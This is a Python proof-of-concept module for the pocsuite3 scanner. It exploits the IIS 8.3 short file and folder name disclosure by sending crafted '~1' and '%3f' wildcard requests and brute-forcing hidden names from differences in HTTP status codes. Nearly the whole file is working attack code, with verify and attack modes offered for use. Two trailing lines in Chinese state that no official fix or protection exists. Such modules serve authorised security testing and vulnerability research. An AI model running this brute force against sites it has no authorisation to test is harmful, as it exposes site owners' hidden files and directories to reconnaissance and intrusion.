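"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.lib.utils import random_str
from urllib.parse import urlparse
from urllib.parse import quote


class iis_short_burst():
    """Probe an IIS site for the 8.3 short-name disclosure behaviour.

    Every probe is a plain GET whose path carries a ``~1`` short-name
    marker, a ``*`` or ``%3f`` wildcard run and a trailing ``/a.aspx``
    or ``/.aspx`` segment; existence of a name is inferred only from
    differences between the HTTP status codes of such probes. That
    request shape (many ``~1`` / ``%3f`` paths ending in ``.aspx``) is
    what shows up in web-server logs when this class runs.
    """

    def __init__(self, domain):
        # Wildcard tails appended to probe paths.
        self.magic_part = "*/a.aspx"
        self.magic_filename = "*~1"
        self.magic_ext = "*~1."
        # Only scheme and host are kept: every probe starts at the site root.
        p = urlparse(domain)
        self.url = "{0}://{1}/".format(p.scheme, p.netloc)
        # Candidate characters, tried in this order for each name position.
        brute_str = "0123456789abcdefghijklmnopqrstuvwxyz!#$%&'()-@^_`{}~"
        self.brute_list = list(brute_str)
        # Filled by attack() with the recovered path, or None.
        self.foder = None

    def isReliable(self, direc):
        """Return True when ``direc`` answers differently for existing and random names.

        Three probes are compared: the prefix as given and two random
        10- and 11-character prefixes that cannot exist. The prefix is
        accepted only if the real probe's status differs from the first
        random one while both random probes agree, which rules out
        servers that simply answer every request differently.
        A request that raises counts as status 0; only ``Exception`` is
        swallowed so that KeyboardInterrupt still aborts a scan.
        """
        try:
            validStatus = requests.get(direc + self.magic_filename + self.magic_part).status_code
        except Exception:
            validStatus = 0
        try:
            invalidStatus = requests.get(
                direc + random_str(length=10) + self.magic_filename + self.magic_part
            ).status_code
        except Exception:
            invalidStatus = 0
        if validStatus == invalidStatus:
            return False
        try:
            anoinvalidStatus = requests.get(
                direc + random_str(11) + self.magic_filename + self.magic_part
            ).status_code
        except Exception:
            anoinvalidStatus = 0
        return anoinvalidStatus == invalidStatus

    # Decide whether the entry currently being brute-forced is a directory.
    def isFolder(self, iCountofName):
        """Return True when a 404 is returned for a ``%3f``-padded ``~1/.aspx`` probe.

        ``iCountofName`` is the number of ``%3f`` wildcards, i.e. the
        short-name length found by getCountofNameandExt().
        NOTE(review): self.url already ends with "/", so this path starts
        with "//"; kept as the original did.
        """
        checkUrl = self.url + "/" + "%3f" * iCountofName + "~1/.aspx"
        statusCode = requests.get(checkUrl).status_code
        return statusCode == 404

    # Determine the name length and the extension length separately.
    def getCountofNameandExt(self):
        """Return ``(name_length, extension_length)`` for the first matching entry.

        The name length is the smallest i in 1..6 for which the
        ``%3f``*i probe returns 404, defaulting to 6 when none does.
        If the entry looks like a folder the extension length is 0;
        otherwise the extension length is grown while the probe keeps
        returning 400. NOTE(review): that loop has no upper bound, so a
        server that always answers 400 keeps it running.
        """
        iCountofName = 6
        for i in range(1, 7):
            checkUrl = self.url + "/" + "%3f" * i + "~1." + self.magic_part
            statusCode = requests.get(checkUrl).status_code
            if statusCode == 404:
                iCountofName = i
                break
        if self.isFolder(iCountofName):
            return iCountofName, 0
        iCountofExt = 1
        while True:
            probe = self.url + "/" + "%3f" * iCountofName + "~1." + "%3f" * iCountofExt + "/.aspx"
            statusCode = requests.get(probe).status_code
            if statusCode != 400:
                break
            iCountofExt += 1
        return iCountofName, iCountofExt

    def verify(self):
        """Return True when the site root itself shows the status-code difference."""
        return self.isReliable(self.url)

    def attack(self):
        """Recover one short name at the site root and store it in ``self.foder``.

        Returns the recovered URL, or None when no candidate matched.
        """
        iCountName, iCountExt = self.getCountofNameandExt()
        self.foder = self.dfs_folder('', iCountName)
        return self.foder

    # Depth-first brute force of the name, one character per level.
    def dfs_folder(self, dic, num):
        """Extend prefix ``dic`` character by character until ``num`` characters are fixed.

        The first candidate for which isReliable() holds is followed;
        siblings are not revisited. Returns ``self.url + prefix`` once
        ``num`` reaches 0, or None when no candidate at the current
        level is accepted (the original fell off the end of the loop with
        the same result; this only makes it explicit).
        """
        if num == 0:
            return self.url + dic
        for d in self.brute_list:
            check = quote(dic + d)
            if self.isReliable(self.url + check):
                return self.dfs_folder(check, num - 1)
        return None


class DemoPOC(POCBase):
    """pocsuite3 wrapper around iis_short_burst (SSV-0848)."""
    vulID = '0848'  # ssvid
    version = '1.0'
    author = ['chenghs@knownsec.com']
    vulDate = '2012-07-02'
    createDate = '2012-07-09'
    updateDate = '2012-07-09'
    references = ['http://www.exploit-db.com/exploits/19525/']
    name = 'IIS Short File/Folder Name Disclosure'
    appPowerLink = 'http://www.microsoft.com'
    appName = 'IIS'
    appVersion = '7.5'
    vulType = 'Information Disclosure'
    desc = '''It is possible to detect short names of files and directories which have an 8.3 file naming scheme equivalent in Windows by using some vectors in several versions of Microsoft IIS. '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Report the target as vulnerable when the root probe is reliable."""
        result = {}
        h = iis_short_burst(self.url)
        if h.verify():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            # The probe path used, recorded for the report.
            result['VerifyInfo']['Postdata'] = self.url + "*~1*/a.aspx"
        return self.parse_output(result)

    def _attack(self):
        """Run the brute force and report the recovered path, if any."""
        h = iis_short_burst(self.url)
        flag = h.attack()
        result = {}
        if flag:
            result['SiteAttr'] = flag
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an Output, failing when it is empty."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)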
暂无官方解决方案
暂无防护方案